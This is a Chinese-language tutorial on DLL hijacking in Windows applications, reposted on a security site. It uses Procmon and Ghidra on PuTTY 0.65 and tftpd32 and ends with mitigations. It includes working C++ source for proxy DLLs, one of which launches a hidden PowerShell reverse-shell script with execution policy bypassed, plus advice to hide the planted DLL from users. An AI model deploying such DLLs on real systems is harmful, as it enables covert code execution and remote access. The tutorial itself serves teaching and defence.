子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

DLL劫持漏洞与思考 – 作者:Kriston

0170

DLL劫持顾名思义,是去执行一个外部库(dll)的代码,而不是执行一个可移植的可执行 PE文件。通过DLL的搜索顺序,可以将代码植入二进制程序让易受攻击的应用程序加载并执行。这不是一个新提出的攻击方法,但有什么更好的方法可以通过NSA最新发布的工具Ghidra找到dll劫持代码吗?

我在这篇文章中将会相当深入地介绍DLL劫持,但首先有一些基本的概念需要了解一下。

使用Procmon,打开目标PE,识别试图从可写路径加载的DLLs文件名。

使用Ghidra识别所述DLL的入口点。

创建入口点是你的有效载荷的DLL。

对编译后的DLL进行重命名,并加入可写目录。

执行存在劫持突破的exe程序。

首先我们需要安装下列程序:

Sysinternals套件

Ghidra-  如果尚未安装,需要Java 11

Visual Studio CE

腻子  0.65-需要劫持的应用程序

tftpd32 v3.50-将被劫持的应用程序

测试DLL劫持的应用有很多,但这些应用都很简单,而且在我遇到的一些文章中都有记录。如果需要深入研究每个例子,一定要查看更多代码。Sysinternals还包含少量的二进制文件,如果你愿意的话,可以进行更多的dll劫持练习。

找到系统中可被劫持的DLL

这一步的目标是找到程序试图加载的DLL,一种是它想加载但是找不到,或者它找到了并且你作为一个低权限用户调用有写入的权限。我们通常去寻找放置C:\,网络共享端,用户桌面,或者其他常见的可写目录下的应用程序。

C:\WindowsC:\Program Files目录中的任何内容都通过Admin privsUAC来保护。在某个场景中,如果UAC可以被绕过,可以通过DLL劫持来实现。参考https://github.com/hfiref0x/UACME,了解大量的UAC绕过技术。

使用Sysinternals工具Procmon,我们可以运行一个PE,并观察它试图加载DLL。PowerSploit也有一些Powershell模块可以识别潜在的可劫持进展和路径。
但是在这里我们还是使用Procmon去查找这些替换文件。

在第一个示例中,我们将对Putty 0.65进行测试。有时情况下,Putty安装在 C:\Program Files (x86)中,这个文件夹是安全并受到保护的。在我们的示例中,我们将其安装在桌面上。

在启动putty之前首先启动Procmon,通过设置一些过滤器来缩小我们的结果。我们要找到Putty试图加载它的文件夹(桌面)中调用但是实际上在文件夹中不存在的DLLs。这是应用程序在Windows系统上搜索外部库的第一个位置。微软官方指南关于DLL搜索顺序

所以我们要在Procmon中设置过滤器,以显示putty试图从其主目录加载时产生而没有找到错误的DLL。设置好过滤器后,运行Putty并检查结果。

替代文字

我们将重点关注WINMM.dll。如果您删除Procmon中的过滤器,您会看到DLL的搜索顺序发生了变化,并在C:\Windows\SysWOW64中找到了有效的winmm.dll,这个dll正式我们想要“劫持”的文件。

替代文字

那么为什么不直接在dll中创建一个有效的副本,重命名后放在桌面上Putty文件夹中呢?因为Putty是在DLL中调用一个函数,如果你在DLL中没有这个函数,会导致Putty崩溃,无法正常加载。

很好,那么我们如何找到Putty调用的函数呢?然后需要使用Ghidra了。

使用GHIDRA寻找DLL函数的入口点

下载Ghidra,将putput.exe合并到主窗口中,让Ghidra进行进行解析。

替代文字

完成后,单击左侧导航栏的符号树,展开导入文件夹。在这里你会看到Putty所有使用的导入库,其中有我们刚才发现的WINMM.DLL。展开WINMM.DLL,我们看到当中有一个唯一被称为过的引入函数PlaySoundA

替代文字

记下这个函数以及DLL中其他被调用的函数名。现在是时候重建我们的DLL了。

构造我们的DLL

现在我们知道了入口点函数和库名,我们可以开始编译恶意的DLL了。请记住,构造完成之后这个函数将被替换为转换函数,方便Putty进行进行导入。

在Visual Studios中创建一个新的dll项目,将下面的代码粘贴到其中的dllmain.cpp中。您也可以对这个代码进行修改,然后在Linux上使用mingw32进行编译。
PlaySoundA函数内部的代码会弹出计算器。

#include "stdafx.h"
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
WinExec("calc", SW_NORMAL);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" __declspec(dllexport) void PlaySoundA()
{
WinExec("calc", SW_NORMAL);
}

使用Windows内置的RUNDLL32.exe对我们编译生成的DLL进行测试。执行RUNDLL32.exe需要两个参数,一个是dll,另一个是其中的包括转换函数名。
在这个例子中,putty会执行DLL_PROCESS_ATTACH和PlaySoundA函数,然后展开计算器。接下来就可以进行最后的dll劫持了。

进攻利用

只需将您编译好的dll移到Putty的目录下,并重命名它,然后执行putty.exe

替代文字

上面的图片显示我们的突破利用成功了,如果你想把这件事做的更隐蔽,,可以把DLL的文件属性设置为“隐藏”,这样一般的Putty用户就不会看到这个单独的DLL,避免产生任何怀疑。

多入口点函数

与上面类似,我们将针对tftpd32 v3.50运行Procmon。这个应用本身不存在漏洞,但他是一个简单的Windows PE例子。这次我们将使用一个reverse shell作为payload以及一个带有多个入口点函数的DLL。

运行Procmon后,识别出几个在程序中被加载的dll:

替代文字

Next, Open Ghidra » Expand Imports » Expand IPHLPAPI.dll and we see 3 functions.
接下来,打开Ghidra -> Expand Imports -> Expand **IPHLPAPI.dll**,我们看到3个函数

替代文字

接下来就是创建我们的DLL。但多个入口点函数如何处理呢?只需像之前一样实现每个导出函数,总共有三个。你需要添加所有的导出函数,否则应用程序在执行的时候会崩溃。
至于有效载荷,它将是一个简单的Powershell反向shell,隐藏在tftpd32目录下(shell.ps1)。

一个例子:

#include "stdafx.h"
#include <stdlib.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("start powershell -win hidden -nonI -nopro -ep bypass -File shell.ps1");
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" __declspec(dllexport) void SendARP()
{
WinExec("calc", SW_NORMAL);
}
extern "C" __declspec(dllexport) void GetIpNetTable()
{
WinExec("calc", SW_NORMAL);
}
extern "C" __declspec(dllexport) void DeleteIpNetEntry()
{
WinExec("calc", SW_NORMAL);
}

编译成DLL,放在对应的文件夹下面并执行。

替代文字

缓解措施

最好的做法是将应用程序和DLL安装在受保护的文件夹中,如

C:\Program Files

C:\Windows

避免直接从网络共享运行可执行文件。相反,将它们移到本地保护的文件夹中。

启用SafeDllSearchMode。现代Windows操作系统(Win2012+)默认启用了SafeDllSearchMode,可以通过注册表GPO进行检查。

设置注册表 Reg keyHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode

Server 2012之前的机器 Prior to 2012Computer Configuration >> Policies >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> MSS: SafeDlSeachlMode

禁用远程DLL加载。有必要加载远程库吗?请记住,任何远程SMB流量都是一个明确的危险信号。

应用程序白名单。如果没有被绕过,这将阻止可执行文件和库在预定义目录之外执行。

参考链接

https://attack.mitre.org/techniques/T1038/

http://www.bluekaizen.org/dll-hijacking-2/

https://pentestlab.blog/2017/03/27/dll-hijacking/

https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works/

https://liberty-shell.com/sec/2019/03/12/dll-hijacking/

来源:freebuf.com 2020-07-18 23:37:35 by: Kriston

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
3年前 4973
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 2044
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 901
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 780
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 717
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020440
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012870
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011950
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010520
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666